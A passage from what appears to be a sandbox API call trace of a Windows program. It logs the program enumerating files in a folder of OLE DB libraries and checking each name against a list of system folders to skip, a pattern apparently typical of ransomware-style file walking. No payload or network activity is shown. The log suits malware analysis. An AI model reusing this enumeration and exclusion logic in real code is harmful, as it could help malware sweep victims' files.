(lpString1="msdaosp.dll", lpString2="msocache") returned -1 [0069.328] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0069.328] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msdaosp.dll", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0069.328] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msdaosp.dll", cchWideChar=11, lpMultiByteStr=0x345ef40, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msdaosp.dll", lpUsedDefaultChar=0x0) returned 11 [0069.328] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0069.328] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0069.328] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msdaosp.dll", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0069.328] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msdaosp.dll", cchWideChar=11, lpMultiByteStr=0x345ef10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msdaosp.dll", lpUsedDefaultChar=0x0) returned 11 [0069.328] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0069.328] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209440 [0069.328] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2252a0 | out: hHeap=0x1e0000) returned 1 [0069.328] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x440870df, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x440870df, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x440870df, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x5be00, dwReserved0=0x60002, dwReserved1=0x232faa, cFileName="msdaps.dll", cAlternateFileName="")) returned 1 [0069.328] lstrcmpiW (lpString1="msdaps.dll", lpString2=".") returned 1 [0069.329] lstrcmpiW (lpString1="msdaps.dll", lpString2="..") returned 1 [0069.329] lstrcmpiW (lpString1="msdaps.dll", lpString2="...") returned 1 [0069.329] lstrcmpiW (lpString1="msdaps.dll", lpString2="windows") returned -1 [0069.329] lstrcmpiW (lpString1="msdaps.dll", lpString2="recovery") returned -1 [0069.329] lstrcmpiW (lpString1="msdaps.dll", lpString2="perflogs") returned -1 [0069.329] lstrcmpiW (lpString1="msdaps.dll", lpString2="documents and settings") returned 1 [0069.329] lstrcmpiW (lpString1="msdaps.dll", lpString2="$RECYCLE.BIN") returned 1 [0069.329] lstrcmpiW (lpString1="msdaps.dll", lpString2="system volume information") returned -1 [0069.329] lstrcmpiW (lpString1="msdaps.dll", lpString2="msocache") returned -1 [0069.329] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0069.329] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msdaps.dll", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0069.329] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msdaps.dll", cchWideChar=10, lpMultiByteStr=0x345ef40, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msdaps.dll", lpUsedDefaultChar=0x0) returned 10 [0069.329] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0069.329] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0069.329] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msdaps.dll", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0069.329] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msdaps.dll", cchWideChar=10, lpMultiByteStr=0x345ef10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msdaps.dll", lpUsedDefaultChar=0x0) returned 10 [0069.329] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0069.329] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209260 [0069.329] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209440 | out: hHeap=0x1e0000) returned 1 [0069.329] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41d0f4ea, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x41d0f4ea, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x41d0f4ea, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xaa800, dwReserved0=0x60002, dwReserved1=0x232faa, cFileName="msdasql.dll", cAlternateFileName="")) returned 1 [0069.329] lstrcmpiW (lpString1="msdasql.dll", lpString2=".") returned 1 [0069.329] lstrcmpiW (lpString1="msdasql.dll", lpString2="..") returned 1 [0069.329] lstrcmpiW (lpString1="msdasql.dll", lpString2="...") returned 1 [0069.329] lstrcmpiW (lpString1="msdasql.dll", lpString2="windows") returned -1 [0069.329] lstrcmpiW (lpString1="msdasql.dll", lpString2="recovery") returned -1 [0069.329] lstrcmpiW (lpString1="msdasql.dll", lpString2="perflogs") returned -1 [0069.329] lstrcmpiW (lpString1="msdasql.dll", lpString2="documents and settings") returned 1 [0069.330] lstrcmpiW (lpString1="msdasql.dll", lpString2="$RECYCLE.BIN") returned 1 [0069.330] lstrcmpiW (lpString1="msdasql.dll", lpString2="system volume information") returned -1 [0069.330] lstrcmpiW (lpString1="msdasql.dll", lpString2="msocache") returned -1 [0069.330] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0069.330] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msdasql.dll", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0069.330] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msdasql.dll", cchWideChar=11, lpMultiByteStr=0x345ef40, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msdasql.dll", lpUsedDefaultChar=0x0) returned 11 [0069.330] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0069.330] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0069.330] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msdasql.dll", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0069.330] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msdasql.dll", cchWideChar=11, lpMultiByteStr=0x345ef10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msdasql.dll", lpUsedDefaultChar=0x0) returned 11 [0069.330] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0069.330] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209788 [0069.330] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209260 | out: hHeap=0x1e0000) returned 1 [0069.330] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41d0f4ea, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x41d0f4ea, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x41d0f4ea, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xd600, dwReserved0=0x60002, dwReserved1=0x232faa, cFileName="msdasqlr.dll", cAlternateFileName="")) returned 1 [0069.330] lstrcmpiW (lpString1="msdasqlr.dll", lpString2=".") returned 1 [0069.330] lstrcmpiW (lpString1="msdasqlr.dll", lpString2="..") returned 1 [0069.330] lstrcmpiW (lpString1="msdasqlr.dll", lpString2="...") returned 1 [0069.330] lstrcmpiW (lpString1="msdasqlr.dll", lpString2="windows") returned -1 [0069.330] lstrcmpiW (lpString1="msdasqlr.dll", lpString2="recovery") returned -1 [0069.330] lstrcmpiW (lpString1="msdasqlr.dll", lpString2="perflogs") returned -1 [0069.330] lstrcmpiW (lpString1="msdasqlr.dll", lpString2="documents and settings") returned 1 [0069.330] lstrcmpiW (lpString1="msdasqlr.dll", lpString2="$RECYCLE.BIN") returned 1 [0069.330] lstrcmpiW (lpString1="msdasqlr.dll", lpString2="system volume information") returned -1 [0069.330] lstrcmpiW (lpString1="msdasqlr.dll", lpString2="msocache") returned -1 [0069.331] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0069.331] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msdasqlr.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0069.331] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msdasqlr.dll", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msdasqlr.dll", lpUsedDefaultChar=0x0) returned 12 [0069.331] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0069.331] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0069.331] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msdasqlr.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0069.331] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msdasqlr.dll", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msdasqlr.dll", lpUsedDefaultChar=0x0) returned 12 [0069.331] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0069.331] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225768 [0069.331] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209788 | out: hHeap=0x1e0000) returned 1 [0069.331] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41d0f4ea, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x41d0f4ea, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x41d0f4ea, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x1ca00, dwReserved0=0x60002, dwReserved1=0x232faa, cFileName="msdatl3.dll", cAlternateFileName="")) returned 1 [0069.331] lstrcmpiW (lpString1="msdatl3.dll", lpString2=".") returned 1 [0069.331] lstrcmpiW (lpString1="msdatl3.dll", lpString2="..") returned 1 [0069.331] lstrcmpiW (lpString1="msdatl3.dll", lpString2="...") returned 1 [0069.331] lstrcmpiW (lpString1="msdatl3.dll", lpString2="windows") returned -1 [0069.331] lstrcmpiW (lpString1="msdatl3.dll", lpString2="recovery") returned -1 [0069.331] lstrcmpiW (lpString1="msdatl3.dll", lpString2="perflogs") returned -1 [0069.331] lstrcmpiW (lpString1="msdatl3.dll", lpString2="documents and settings") returned 1 [0069.331] lstrcmpiW (lpString1="msdatl3.dll", lpString2="$RECYCLE.BIN") returned 1 [0069.331] lstrcmpiW (lpString1="msdatl3.dll", lpString2="system volume information") returned -1 [0069.331] lstrcmpiW (lpString1="msdatl3.dll", lpString2="msocache") returned -1 [0069.331] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0069.331] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msdatl3.dll", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0069.331] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msdatl3.dll", cchWideChar=11, lpMultiByteStr=0x345ef40, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msdatl3.dll", lpUsedDefaultChar=0x0) returned 11 [0069.331] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0069.331] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0069.331] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msdatl3.dll", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0069.331] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msdatl3.dll", cchWideChar=11, lpMultiByteStr=0x345ef10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msdatl3.dll", lpUsedDefaultChar=0x0) returned 11 [0069.331] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0069.332] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209698 [0069.332] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225768 | out: hHeap=0x1e0000) returned 1 [0069.332] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41d0f4ea, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x41d0f4ea, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x41d0f4ea, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0x60002, dwReserved1=0x232faa, cFileName="msxactps.dll", cAlternateFileName="")) returned 1 [0069.332] lstrcmpiW (lpString1="msxactps.dll", lpString2=".") returned 1 [0069.332] lstrcmpiW (lpString1="msxactps.dll", lpString2="..") returned 1 [0069.332] lstrcmpiW (lpString1="msxactps.dll", lpString2="...") returned 1 [0069.332] lstrcmpiW (lpString1="msxactps.dll", lpString2="windows") returned -1 [0069.332] lstrcmpiW (lpString1="msxactps.dll", lpString2="recovery") returned -1 [0069.332] lstrcmpiW (lpString1="msxactps.dll", lpString2="perflogs") returned -1 [0069.332] lstrcmpiW (lpString1="msxactps.dll", lpString2="documents and settings") returned 1 [0069.332] lstrcmpiW (lpString1="msxactps.dll", lpString2="$RECYCLE.BIN") returned 1 [0069.332] lstrcmpiW (lpString1="msxactps.dll", lpString2="system volume information") returned -1 [0069.332] lstrcmpiW (lpString1="msxactps.dll", lpString2="msocache") returned 1 [0069.332] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0069.332] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msxactps.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0069.332] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msxactps.dll", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msxactps.dll", lpUsedDefaultChar=0x0) returned 12 [0069.332] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0069.332] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0069.332] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msxactps.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0069.332] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msxactps.dll", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msxactps.dll", lpUsedDefaultChar=0x0) returned 12 [0069.332] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0069.332] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224bb8 [0069.332] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209698 | out: hHeap=0x1e0000) returned 1 [0069.332] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41ce9283, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x41ce9283, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x41ce9283, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xe6000, dwReserved0=0x60002, dwReserved1=0x232faa, cFileName="oledb32.dll", cAlternateFileName="")) returned 1 [0069.332] lstrcmpiW (lpString1="oledb32.dll", lpString2=".") returned 1 [0069.332] lstrcmpiW (lpString1="oledb32.dll", lpString2="..") returned 1 [0069.332] lstrcmpiW (lpString1="oledb32.dll", lpString2="...") returned 1 [0069.332] lstrcmpiW (lpString1="oledb32.dll", lpString2="windows") returned -1 [0069.332] lstrcmpiW (lpString1="oledb32.dll", lpString2="recovery") returned -1 [0069.333] lstrcmpiW (lpString1="oledb32.dll", lpString2="perflogs") returned -1 [0069.333] lstrcmpiW (lpString1="oledb32.dll", lpString2="documents and settings") returned 1 [0069.333] lstrcmpiW (lpString1="oledb32.dll", lpString2="$RECYCLE.BIN") returned 1 [0069.333] lstrcmpiW (lpString1="oledb32.dll", lpString2="system volume information") returned -1 [0069.333] lstrcmpiW (lpString1="oledb32.dll", lpString2="msocache") returned 1 [0069.333] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0069.333] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="oledb32.dll", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0069.333] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="oledb32.dll", cchWideChar=11, lpMultiByteStr=0x345ef40, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oledb32.dll", lpUsedDefaultChar=0x0) returned 11 [0069.333] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0069.333] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0069.333] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="oledb32.dll", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0069.333] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="oledb32.dll", cchWideChar=11, lpMultiByteStr=0x345ef10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oledb32.dll", lpUsedDefaultChar=0x0) returned 11 [0069.333] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0069.333] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209698 [0069.333] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224bb8 | out: hHeap=0x1e0000) returned 1 [0069.333] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41ce9283, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x41ce9283, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x41ce9283, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x13000, dwReserved0=0x60002, dwReserved1=0x232faa, cFileName="oledb32r.dll", cAlternateFileName="")) returned 1 [0069.333] lstrcmpiW (lpString1="oledb32r.dll", lpString2=".") returned 1 [0069.333] lstrcmpiW (lpString1="oledb32r.dll", lpString2="..") returned 1 [0069.333] lstrcmpiW (lpString1="oledb32r.dll", lpString2="...") returned 1 [0069.333] lstrcmpiW (lpString1="oledb32r.dll", lpString2="windows") returned -1 [0069.333] lstrcmpiW (lpString1="oledb32r.dll", lpString2="recovery") returned -1 [0069.333] lstrcmpiW (lpString1="oledb32r.dll", lpString2="perflogs") returned -1 [0069.333] lstrcmpiW (lpString1="oledb32r.dll", lpString2="documents and settings") returned 1 [0069.333] lstrcmpiW (lpString1="oledb32r.dll", lpString2="$RECYCLE.BIN") returned 1 [0069.333] lstrcmpiW (lpString1="oledb32r.dll", lpString2="system volume information") returned -1 [0069.333] lstrcmpiW (lpString1="oledb32r.dll", lpString2="msocache") returned 1 [0069.333] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0069.333] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="oledb32r.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0069.333] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="oledb32r.dll", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oledb32r.dll", lpUsedDefaultChar=0x0) returned 12 [0069.334] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0069.334] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0069.334] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="oledb32r.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0069.334] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="oledb32r.dll", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oledb32r.dll", lpUsedDefaultChar=0x0) returned 12 [0069.334] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0069.334] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224ee8 [0069.334] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209698 | out: hHeap=0x1e0000) returned 1 [0069.334] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41ce9283, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x41ce9283, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x41ce9283, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x264c, dwReserved0=0x60002, dwReserved1=0x232faa, cFileName="oledbjvs.inc", cAlternateFileName="")) returned 1 [0069.334] lstrcmpiW (lpString1="oledbjvs.inc", lpString2=".") returned 1 [0069.334] lstrcmpiW (lpString1="oledbjvs.inc", lpString2="..") returned 1 [0069.334] lstrcmpiW (lpString1="oledbjvs.inc", lpString2="...") returned 1 [0069.334] lstrcmpiW (lpString1="oledbjvs.inc", lpString2="windows") returned -1 [0069.334] lstrcmpiW (lpString1="oledbjvs.inc", lpString2="recovery") returned -1 [0069.334] lstrcmpiW (lpString1="oledbjvs.inc", lpString2="perflogs") returned -1 [0069.334] lstrcmpiW (lpString1="oledbjvs.inc", lpString2="documents and settings") returned 1 [0069.334] lstrcmpiW (lpString1="oledbjvs.inc", lpString2="$RECYCLE.BIN") returned 1 [0069.334] lstrcmpiW (lpString1="oledbjvs.inc", lpString2="system volume information") returned -1 [0069.334] lstrcmpiW (lpString1="oledbjvs.inc", lpString2="msocache") returned 1 [0069.334] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0069.334] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="oledbjvs.inc", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0069.334] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="oledbjvs.inc", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oledbjvs.inc", lpUsedDefaultChar=0x0) returned 12 [0069.334] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0069.334] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0069.334] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="oledbjvs.inc", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0069.334] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="oledbjvs.inc", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oledbjvs.inc", lpUsedDefaultChar=0x0) returned 12 [0069.334] HeapFree (in: 